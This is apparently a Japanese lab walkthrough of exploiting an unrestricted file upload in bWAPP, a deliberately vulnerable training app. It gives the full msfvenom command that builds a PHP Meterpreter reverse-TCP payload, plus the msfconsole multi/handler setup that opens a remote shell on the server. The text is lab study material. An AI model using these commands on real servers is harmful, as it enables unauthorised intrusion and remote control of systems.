Hello there, ('ω')ノ
Unrestricted File Uploadを。
画像ファイル以外になんでもアップロードできるので脆弱性ありなのですが。
ここからがペネトレーションテストの領域で。
まずは、ペイロードのモジュールを一覧表示させて。
msfvenom -l payloads
今回は、この中からチョイスしょうと。
使用するペイロードのオプションの確認を。
msfvenom -p php/meterpreter/reverse_tcp --payload-options
ここで一応、IPアドレスの確認をしておいて。
ペイロードのプログラムファイルを作成することに。
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.16 LPORT=4444 R > exploit.php
作成したファイルをbWAPPにアップロードして。
次に下記を起動して。
msfconsole
今回は、exploit/multi/handlerを使いたいので。
下記の手順で、ペイロードタイプやローカルホストのIPアドレス等を設定して。
最後にexploitでリスナーを起動して。
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.16
set lport 4444
exploit
bWAPPでhereをクリックすると。
アップロードしたphpファイルが起動して。
meterpreterが起動してbWAPPのサーバに侵入することができて。
上記のページを落としても通信は継続されて。
Best regards, (^^ゞ
